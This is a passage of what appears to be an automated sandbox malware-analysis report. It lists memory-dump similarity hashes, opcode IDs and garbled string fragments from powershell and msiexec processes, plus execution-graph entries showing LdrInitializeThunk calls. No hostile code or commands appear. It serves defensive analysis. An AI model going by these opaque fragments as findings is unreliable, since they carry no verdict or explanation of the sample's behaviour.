                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5fa006566e6856c2b2f9a6808a0a075cddf5ddb29c813f87160000386761563c
                                            • Instruction ID: 4e777895bddaab2295c042f9f567554433c62a4cc02be42f3e808a4f25ffead3
                                            • Opcode Fuzzy Hash: 5fa006566e6856c2b2f9a6808a0a075cddf5ddb29c813f87160000386761563c
                                            • Instruction Fuzzy Hash: 70212674A002059FCB05CF58C9949AAFBF1FF49310B2585AAE948EB361C331FD81CBA1
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8da81c9427a3d26bd45c2d66ba73c042ab5bd2ca404c435d7e2a0ebf31dd7766
                                            • Instruction ID: 6d152bcf48c528b9cda50f95be02a62d54dc92aab6ba6e7be31546cfe5e1dd7d
                                            • Opcode Fuzzy Hash: 8da81c9427a3d26bd45c2d66ba73c042ab5bd2ca404c435d7e2a0ebf31dd7766
                                            • Instruction Fuzzy Hash: F4210774A002199FCB01CF59C980AAEFBB5FF48310B1485A5E949E7362C731FD91CBA0
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 366c74b15df885d01e2ed3672065a801c1327b4089a5270d9d432b338b531a8e
                                            • Instruction ID: fb98befc97460890d278a2cd0b6905ae5a732a0fd31ee08fbb89f3fc45508818
                                            • Opcode Fuzzy Hash: 366c74b15df885d01e2ed3672065a801c1327b4089a5270d9d432b338b531a8e
                                            • Instruction Fuzzy Hash: 052129B4E0020A8FCB00CF98D8909AABBF5FF49310B148499E809AB352D731FD41CBA1
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d38ab7b4d89b4b1002b7d4c59347ffd460744f34fe6e0dce0cd08b9fd8ad5e56
                                            • Instruction ID: e90641079758535e2e45da2277a05859acd1890f5f37e1e98315b8ddb5941fd3
                                            • Opcode Fuzzy Hash: d38ab7b4d89b4b1002b7d4c59347ffd460744f34fe6e0dce0cd08b9fd8ad5e56
                                            • Instruction Fuzzy Hash: 6401D8773002295BD7285999D400667F79EDBC1221F24843AD94DCA285D6B2D455C760
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2016250732.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_46b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 87efd345b680b02a67598de7cfdfb97ce1e7cc2d66c1bade0e0ea8f4fcf7f022
                                            • Instruction ID: ffda246ab0ef5aec766e2439db34c34eb9752afe6acb3b878689ff02684304c6
                                            • Opcode Fuzzy Hash: 87efd345b680b02a67598de7cfdfb97ce1e7cc2d66c1bade0e0ea8f4fcf7f022
                                            • Instruction Fuzzy Hash: 28117730E00149DBEF28DA94D9947ECB7B1AB1931DF141529C881F62B0FB7568CACF96
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2008088158.0000000002DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DAD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_2dad000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dc3933e40dac43ee2e687d20b0ab32f10e57b8fc87ccd44a9c8bac6457b53ddb
                                            • Instruction ID: 7e50357fa656130a9cee79207646401c728c8f379b3684c713a685c575d20778
                                            • Opcode Fuzzy Hash: dc3933e40dac43ee2e687d20b0ab32f10e57b8fc87ccd44a9c8bac6457b53ddb
                                            • Instruction Fuzzy Hash: 8801F2714083409AE7208B29C995F67BFD9EF41324F28C42AEC480A786C779DC42C6B5
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2008088158.0000000002DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DAD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_2dad000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c6aeefa7bd6b4ff1cddee1bfde51f5f8b6546a6dae02fdf9181e030e94c3dd44
                                            • Instruction ID: ea2d052397a0960aeb059bdacd7bed5f134c1d29276d68b6ae1fdf7ccb17374f
                                            • Opcode Fuzzy Hash: c6aeefa7bd6b4ff1cddee1bfde51f5f8b6546a6dae02fdf9181e030e94c3dd44
                                            • Instruction Fuzzy Hash: 18F0C271408340AEE7108E16C9C8B67FFE8EB41734F28C45AED480E686C3799841CAB1
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 32cdb7c4b3c9839cbadf61fbc47f1c2490df2d85572dcaa3e8badd14d73eaa73
                                            • Instruction ID: 624c4787a1195f97b750176b22b22e8743d19f62a75c224595c80b70fdf56523
                                            • Opcode Fuzzy Hash: 32cdb7c4b3c9839cbadf61fbc47f1c2490df2d85572dcaa3e8badd14d73eaa73
                                            • Instruction Fuzzy Hash: 34F0A5B060E2D5DFE7128B54C955A10BFB5AF87208B1EC0DBC0989F1A7C7669886CB15
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2008088158.0000000002DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DAD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_2dad000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4acccdca2fcced70c6b350963624ebccbba2c3bd903a0c84f7e186062ad70a22
                                            • Instruction ID: 60c22c1c439d00c7d09554a9426737eb9e8daa429713077b4a2b06ebfd70d9a7
                                            • Opcode Fuzzy Hash: 4acccdca2fcced70c6b350963624ebccbba2c3bd903a0c84f7e186062ad70a22
                                            • Instruction Fuzzy Hash: A4210076504200DFDB09DF14DAC0F2ABFA6FB88324F24C569E80A4B756C336DC56CAA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$84)l$84)l$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                            • API String ID: 0-242852452
                                            • Opcode ID: 4ff819bf90f4bec55251d107783bb86416cfb2343ff284368f0c1f7252e33840
                                            • Instruction ID: c0d423c9c682f08d23d3cd4a3848646d239a5d55f7f34140c2406f340eccb00d
                                            • Opcode Fuzzy Hash: 4ff819bf90f4bec55251d107783bb86416cfb2343ff284368f0c1f7252e33840
                                            • Instruction Fuzzy Hash: 71024BB0B00229CFEB258F69C4446AEBBEABF85710F14C46AD44D8F295DB31D845CBB1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                            • API String ID: 0-3512890053
                                            • Opcode ID: e4e0dc57e7d386a1369bb12b9b676eda69350df45e6ed6f16b0af6a17ecbb9b3
                                            • Instruction ID: 11573ee14ec14aaf235421444a8aaa2459794a07930ffa88340a249568e177ff
                                            • Opcode Fuzzy Hash: e4e0dc57e7d386a1369bb12b9b676eda69350df45e6ed6f16b0af6a17ecbb9b3
                                            • Instruction Fuzzy Hash: A6A15CB170462A9FEB254A29981067BBBEDBF81250F14847AD809CF3D6DE71CC85C3A1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$84)l$84)l$tP^q$tP^q$$^q$(dq$(dq$(dq
                                            • API String ID: 0-1559462893
                                            • Opcode ID: 80afa4c3363a71cf7fe1c14c8fbb4ef6e403daf5c2c53b0a0e1ccd58722160d1
                                            • Instruction ID: ef3fcdddf1c6dd8e7bfbe7b0640b85177a0c86db2bdda024f99a95e5e678a2b5
                                            • Opcode Fuzzy Hash: 80afa4c3363a71cf7fe1c14c8fbb4ef6e403daf5c2c53b0a0e1ccd58722160d1
                                            • Instruction Fuzzy Hash: 9561A2B4B202299FEB24CF15C944B6AB7FAAB44710F198469EC4D6B2D0C731ED80CB51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f+l$(f+l$(f+l$(f+l$4'^q$4'^q$4(l$4(l
                                            • API String ID: 0-2719617653
                                            • Opcode ID: 9b01ae4b554e190999111314ab1203de82869fdcbfdc026c7a182dc2abadf611
                                            • Instruction ID: 2a7ca3f347c25eda76b14f93a00829e06287d5f101d5e37247307d1e82edaeaf
                                            • Opcode Fuzzy Hash: 9b01ae4b554e190999111314ab1203de82869fdcbfdc026c7a182dc2abadf611
                                            • Instruction Fuzzy Hash: 5561F4B4B402199FFB14CB58C441A6ABBEABF84304F14856DD809AB794CF72EC45CB92
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$84)l$TQcq$TQcq$tP^q$$^q$$^q$$^q
                                            • API String ID: 0-1033743996
                                            • Opcode ID: 54c1187d1083b6584dcab2475f5a7ea3bcc98ac32817a8bbdbae02e2a1019bda
                                            • Instruction ID: 1daf55afb1cf1c108fc1a359a6722b7180cd717365d8142221a3a6829548b9ec
                                            • Opcode Fuzzy Hash: 54c1187d1083b6584dcab2475f5a7ea3bcc98ac32817a8bbdbae02e2a1019bda
                                            • Instruction Fuzzy Hash: FC51C5F072022ADFEB248E05C54476AB7BEBB45315F5484AAE80D5B6D4CB72EC84CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$84)l$d%dq$d%dq$d%dq$tP^q$$^q
                                            • API String ID: 0-358516049
                                            • Opcode ID: 0c481cd7a1897ef8b382b0eca44d5ff5d776eeccd027ce0056e2254b2612d1db
                                            • Instruction ID: 76d77f9c9d756f865be6a51f03b4533491bdd42dff48ceee8aafee050be7f698
                                            • Opcode Fuzzy Hash: 0c481cd7a1897ef8b382b0eca44d5ff5d776eeccd027ce0056e2254b2612d1db
                                            • Instruction Fuzzy Hash: 005107F0B102659FEB248F14C550BAEBBEAAF85750F18905AE8099F6D1C731DD41CBB1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$84)l$tP^q$$^q$$^q$$^q
                                            • API String ID: 0-2078117423
                                            • Opcode ID: 5f8c805ef7c4c81dd0ebbcb7b204b99e7521bb21b150cbd10ffd8cebe349c5da
                                            • Instruction ID: 3dcaf65eecfe84a31a220a8a2ed6e0b2ea69c0288a09c37a71b5b05cb6542659
                                            • Opcode Fuzzy Hash: 5f8c805ef7c4c81dd0ebbcb7b204b99e7521bb21b150cbd10ffd8cebe349c5da
                                            • Instruction Fuzzy Hash: F861BDF172022ADBFF28CE15C5447BA77AEAF85311F148469E8085B6D4C731ED85CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$t~qq$$^q$$^q$$^q
                                            • API String ID: 0-2923853403
                                            • Opcode ID: 7843a80724cb19bba6f639893325f123e518cde6a17eb9d4522ba29c5a326c71
                                            • Instruction ID: edb74899ac6fe138828668445b313c217c39532d912139497ecc3aa145d3a4db
                                            • Opcode Fuzzy Hash: 7843a80724cb19bba6f639893325f123e518cde6a17eb9d4522ba29c5a326c71
                                            • Instruction Fuzzy Hash: B0418BB1B4026E9FEB281A698400277F79EBBC5210F24496AD5098F2C5DF32CC86C393
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$84)l$d%dq$d%dq$d%dq$tP^q
                                            • API String ID: 0-380581462
                                            • Opcode ID: 3a0fe680bb4cbd060925afecdd7a0a8ed0f8acef0d3defd8fe3b598c2e88d708
                                            • Instruction ID: 6ce28ec46d423100de3112760a8d20610163cac2a14cd198a08cfed018c28f36
                                            • Opcode Fuzzy Hash: 3a0fe680bb4cbd060925afecdd7a0a8ed0f8acef0d3defd8fe3b598c2e88d708
                                            • Instruction Fuzzy Hash: 6331C4B4B10229DFE724DF58C454A5EFBAAFB48710F249559E809AF790C731DC42CBA2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 84)l$XRcq$XRcq$tP^q$$^q
                                            • API String ID: 0-631777751
                                            • Opcode ID: f9613fd2c03b2d7e3b2a0e3c35958ecdb201431543a9eaeea76c107a1c71adf7
                                            • Instruction ID: d7a6bdbe7a865a790be0fe9071f34b8b718eb4bad97b0423be7fdaaf3450ead7
                                            • Opcode Fuzzy Hash: f9613fd2c03b2d7e3b2a0e3c35958ecdb201431543a9eaeea76c107a1c71adf7
                                            • Instruction Fuzzy Hash: 9E4193B0A40229DBFB24DE45C544BA9BBFAAF89710F19C099E81C6B3D4C732DD80CB50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                            • API String ID: 0-3272787073
                                            • Opcode ID: 7f0f90e5247a0e767e96c23ae33d8ddd02812c3bd6faaaf5504b036a569e7ab7
                                            • Instruction ID: 9691ed96a12b3419dbcf63454cac043f6e8f741c63f4cd0845ed1df99781c68c
                                            • Opcode Fuzzy Hash: 7f0f90e5247a0e767e96c23ae33d8ddd02812c3bd6faaaf5504b036a569e7ab7
                                            • Instruction Fuzzy Hash: EA3146F6F002BACFEB294E259444176B7ADABC9611B24886FE81D8F6C4DE31C445CB51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                            • API String ID: 0-3997570045
                                            • Opcode ID: a9dd03b020475321fa25e75751fc9bc6f7f3df5584c619541133b43e78830c68
                                            • Instruction ID: d1746795313a4221eb6b36e76784b66cdd18f24214f046d946065d0db5b0ab68
                                            • Opcode Fuzzy Hash: a9dd03b020475321fa25e75751fc9bc6f7f3df5584c619541133b43e78830c68
                                            • Instruction Fuzzy Hash: F731E6F1E00225DBFB248E15C544BE6B7ADBB85310F149069D91D5F6D0CB31D884CB51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $^q$$^q$$^q$!l$!l
                                            • API String ID: 0-3278379306
                                            • Opcode ID: b462a52be6ab4fb782de5315b07667a77c198839e13be218dcc33b478192d464
                                            • Instruction ID: f19cdf9e158fca52e1bf5d234cd4056ced81ab1d6fea42de15d2d029f392afbd
                                            • Opcode Fuzzy Hash: b462a52be6ab4fb782de5315b07667a77c198839e13be218dcc33b478192d464
                                            • Instruction Fuzzy Hash: 3411D6F130433A9BF736595A9804F76F79EABC1720F24C42AA54D8A6D4D971C841CB50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (o^q$(o^q$(o^q$(o^q
                                            • API String ID: 0-1978863864
                                            • Opcode ID: 7b95ad28fac787b1e68efa8aa611dfc1801f6ab6a76f3ea147226254059e3db5
                                            • Instruction ID: fcbd93026e7365f0a32fe241c07473ba7988e568db6898e037028fd04efc669f
                                            • Opcode Fuzzy Hash: 7b95ad28fac787b1e68efa8aa611dfc1801f6ab6a76f3ea147226254059e3db5
                                            • Instruction Fuzzy Hash: 80F159B170431ADFEB158F68C8407AEBBAABF85310F14947AE8499B2D1DB31D845C7B0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$4'^q$4'^q
                                            • API String ID: 0-1420252700
                                            • Opcode ID: 46fa603634cfba61cd7b9e5383f01304c0ded9f090a3c7e20c653cc8ea28fdf0
                                            • Instruction ID: 56e69cc7874b988542784241c313cea39b0bb3349c28600537dfa6e2df3477a1
                                            • Opcode Fuzzy Hash: 46fa603634cfba61cd7b9e5383f01304c0ded9f090a3c7e20c653cc8ea28fdf0
                                            • Instruction Fuzzy Hash: A8127EB4B0121D9FE714CB98C451F9ABBB6BB88304F14C069E809AF795CB72EC45CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f+l$(f+l$4'^q$4'^q
                                            • API String ID: 0-2018738063
                                            • Opcode ID: f161918a4e75a215373d227370d59508250388d5b7c2aa59ac418cb41d4b75a2
                                            • Instruction ID: 2c6620eab78463087f7aa1bbd9176bd177635eb4c9efb266a2246a075e23f41f
                                            • Opcode Fuzzy Hash: f161918a4e75a215373d227370d59508250388d5b7c2aa59ac418cb41d4b75a2
                                            • Instruction Fuzzy Hash: 1AC19EF4A40229DFFB24DB54C551B6EFBBAAF88704F148429D80A6B794CB31EC45CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$XY+l$XY+l
                                            • API String ID: 0-1222878540
                                            • Opcode ID: a65220a47d1c4c45585c2530b2572ca2d4a8d484b8437efa8480e768d06c3ee4
                                            • Instruction ID: 775fe0e35c1a36302d7602bbb47828b24f61a10123f82a6f259aaffccb72c30b
                                            • Opcode Fuzzy Hash: a65220a47d1c4c45585c2530b2572ca2d4a8d484b8437efa8480e768d06c3ee4
                                            • Instruction Fuzzy Hash: D3814CF570432A8FE7198B68954466ABBEE9FC6210F38807BC40DCF2D5EA72D845C761
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f+l$(f+l$(f+l$(f+l
                                            • API String ID: 0-2354121962
                                            • Opcode ID: 6c9690d24785cd794ba4c467e834db1dfac7da899f4ade23ccf4bc721705d8e7
                                            • Instruction ID: 206a094b91d3d1d03234be05019da28d2b39fbc58df09eeb1ae864866a582a01
                                            • Opcode Fuzzy Hash: 6c9690d24785cd794ba4c467e834db1dfac7da899f4ade23ccf4bc721705d8e7
                                            • Instruction Fuzzy Hash: 4A7172B4E01219DFEB14CF58C551AAEFBFAAF85314F148069D8086B795CB32EC42CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (f+l$(f+l$4'^q$4(l
                                            • API String ID: 0-187886399
                                            • Opcode ID: defdba9f53bc1ab719be9bcfd9a2c8e1e703b4fa531d17bc259e4267f5be1dde
                                            • Instruction ID: a89743553017d9bc5cb7f7eb601f5152e55cae869842a6b1a3ae90f887b1e9aa
                                            • Opcode Fuzzy Hash: defdba9f53bc1ab719be9bcfd9a2c8e1e703b4fa531d17bc259e4267f5be1dde
                                            • Instruction Fuzzy Hash: 8C61E1F4A40216DFFB24CF54C441A6AFBEABF85314F18816DE8496B395CB71E841CB92
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $^q$$^q$$^q$$^q
                                            • API String ID: 0-2125118731
                                            • Opcode ID: b30fc3af97953cbb968d6fcfa5c44f0b14402fb0cb9eedb413c6cae8380cfb25
                                            • Instruction ID: cc307f12e4fac00d7910e23b053ab73224b2c5a581326aad3198386c840d4c69
                                            • Opcode Fuzzy Hash: b30fc3af97953cbb968d6fcfa5c44f0b14402fb0cb9eedb413c6cae8380cfb25
                                            • Instruction Fuzzy Hash: EF2135B270022EABFB34592A9841B37B69E9BC1710F24842AB90DCB3C5CD36D8808361
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2053261132.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_73e0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$$^q$$^q
                                            • API String ID: 0-2049395529
                                            • Opcode ID: 43e71ea58941365dc4b22a7690018d102ee535642230067fec9d606a34382f36
                                            • Instruction ID: e28e71a137cbe0e20a70b8b41f2549178efd8c6fb29200baecb51737fd7e4a04
                                            • Opcode Fuzzy Hash: 43e71ea58941365dc4b22a7690018d102ee535642230067fec9d606a34382f36
                                            • Instruction Fuzzy Hash: 1301FC606493995FD72B022808205766FA65FC351071A44DFC085DF3D7CC658C898397

                                            Execution Graph

                                            Execution Coverage: 0%
                                            Dynamic/Decrypted Code Coverage: 0%
                                            Signature Coverage: 25%
                                            Total number of Nodes: 4
                                            Total number of Limit Nodes: 1
                                            execution_graph 18619 24892c0a 18620 24892c1f LdrInitializeThunk 18619->18620 18621 24892c11 18619->18621 18623 24892df0 LdrInitializeThunk

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 5 248935c0-248935cc LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a7254fe8a8015a9489dcb0b81c3bbbdf3b4cfb5132bedf89f1586df01619f01b
                                            • Instruction ID: 6d545189bc49330dfd15ed2e667ca074ed61fd532b66791f79fd90444b736821
                                            • Opcode Fuzzy Hash: a7254fe8a8015a9489dcb0b81c3bbbdf3b4cfb5132bedf89f1586df01619f01b
                                            • Instruction Fuzzy Hash: 8D900271B1951446D1007198455470610055BD0205F65C511B1425528D87D5DA9565F3

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 4 24892df0-24892dfc LdrInitializeThunk
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 48d5ebcc426c2e462744450f57ec548479d5ef7c65fc3cbb197ceb70e2e6350e
                                            • Instruction ID: 3b729bc35748fc4310d00f0f0c1640f12885b1a3d0fd82e4d337106ca8f72918
                                            • Opcode Fuzzy Hash: 48d5ebcc426c2e462744450f57ec548479d5ef7c65fc3cbb197ceb70e2e6350e
                                            • Instruction Fuzzy Hash: BB90027171541457D1117198454470700095BD0245F95C512B1425518D9696DA96A172

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 24892c0a-24892c0f 1 24892c1f-24892c26 LdrInitializeThunk 0->1 2 24892c11-24892c18 0->2
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 89590b7fcc375701e9f01003361c7acefdff1a6522e90af23c22807e116ed92c
